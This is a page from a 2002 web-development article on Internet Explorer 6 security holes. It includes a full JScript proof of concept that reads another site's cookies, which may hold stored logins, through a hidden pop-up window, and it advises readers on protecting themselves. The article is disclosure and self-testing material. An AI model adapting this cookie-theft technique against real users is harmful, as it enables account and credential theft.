Home arrow HTML arrow Page 2 - Internet Explorer 6 Hacks And Holes Exposed
HTML

Internet Explorer 6 Hacks And Holes Exposed


Apparently Microsoft were in a little bit of a rush to get Internet Explorer 6 out the door, and forgot to take that extra bit of time to debug and test it for security cracks and holes. In this article Mitchell talks about the latest security holes found in IE6. He shows you how to test your system for vulnerabilities and also provides links to the relevant patches and more information on the holes.

Author Info:
By: Mitchell Harper
Rating: 5 stars5 stars5 stars5 stars5 stars / 20
February 14, 2002
TABLE OF CONTENTS:
  1. · Internet Explorer 6 Hacks And Holes Exposed
  2. · Mmmmm... gimme cookie!
  3. · Site Impersonation: Mixed Identities
  4. · Direct file access
  5. · Conclusion

print this article
SEARCH DEVARTICLES

Internet Explorer 6 Hacks And Holes Exposed - Mmmmm... gimme cookie!
(Page 2 of 5 )

Cookies have taken their fair share of slack over the last couple of years, with many people insisting that cookies are not safe and that they can easily be "stolen" by another site. I, like many others, had simply dismissed this idea. If cookies are stored in a file on the visitor's computer, how can anyone access them remotely, right? It's just crazy. Indeed it is.

If you're running IE6, then the persistent cookies for any site you've visited can be stolen using two lines of JScript. Let's give this a test. Go and visit any site that lets you create a members account, but also lets you choose a "remember me for later" option. The "remember me for later" option is commonly used to allow visitors of a site to not have to re-enter their user credentials every time they re-visit the site. On smaller, less-global sites, typically a cookie is saved to the visitors' machine containing both the users login ID and password so that they can be logged in automatically the next time they visit.

Once you've created your new user account, remember the URL of the site. Create a new file named c:\cookie_steal.html and enter the following code into it:

<html>

<head>

<title> Mmmmm Gimme Cookie! </title>

<script language="JavaScript">

<!--

function getCookie()

{

url = prompt("Enter a fully qualified domain name:");

win = document.open(url, "urlWin", "top=5000, left=5000, width=1, height=1");

cookie = win.document.cookie;

// Close the window, we're done with it

win.close();

cookies = cookie.split(';');

// How many are there?

num = cookies.length;

for(i = 0; i < num; i++)

{

// Get the cookie from the name/value pair

curCookie = cookies[i].split('=');

// Write its name

document.write("<b>" + curCookie[0] + ": </b>");

// Write its value

document.write(curCookie[1] + "<br>");

}

}

-->

</script>

</head>

<body bgcolor="#FFFFFF" onLoad="getCookie()">

</body>

</html>


Load the page in your browser and enter the full domain name (including the http:// part) of the site that you just joined into the popup box. I won't disclose the details of the site that I joined, but here's the output in my browser:

Displaying cookies from another site

As I'm sure you'll agree, this is one major security flaw: cookies were designed and implemented in such a way that one site could never access the cookies from another site, either by client-side code or server-side scripting technologies. I guess it would be understandable if it took 100,000 lines of code and 25 mainframe computers to get the cookies of a remote site from your PC, but using a couple of lines of JScript to do it just doesn't cut the mustard.

Think of all the ways that these cookies can be used and abused. If Joe Bloggs decides to create a page on his site that uses the JScript function above to get cookies from your PC (which could contain your user ID and password) for your online bank account and takes $10,000, them how do you prove it was him? There's no sign of forced entry, and you don't even know that your account details were stolen. Not good.

If you're using IE6, never select an option to "remember you for later". This could come back and bite you down the track, when you realize that someone has logged into one of your online accounts and has taken some of your personal data or belongings. Also, if you can live without cookies, do so. Set the security options in IE6 to notify you when cookies are being set, and only accept them if they contain jumbled data, such as an encrypted session ID or variable.
blog comments powered by Disqus
HTML ARTICLES

- Does HTML5 Need a Main Element?
- Revisiting the HTML5 vs. Native Debate
- HTML5: Not for Phone Apps?
- HTML5 or Native?
- Job Hunting? Freelancer.com Lists This Quart...
- HTML5 in the News
- Report: HTML5 Mobile Performance Lags
- The Top HTML5 Audio Players
- Top HTML5 Video Tutorials
- HTML5: Reasons to Learn and Use It
- More of the Top Tutorials for HTML5 Forms
- MobileAppWizard Releases HTML5 App Builder
- HTML5 Boilerplate: Working with jQuery and M...
- HTML5 Boilerplate Introduction
- New API Platform for HTML5

Watch our Tech Videos 
Dev Articles Forums 
 RSS  Articles
 RSS  Forums
 RSS  All Feeds
Write For Us 
Weekly Newsletter
 
Developer Updates  
Free Website Content 
Contact Us 
Site Map 
Privacy Policy 
Support 

Developer Shed Affiliates

 




© 2003-2017 by Developer Shed. All rights reserved. DS Cluster - Follow our Sitemap
Popular Web Development Topics
All Web Development Tutorials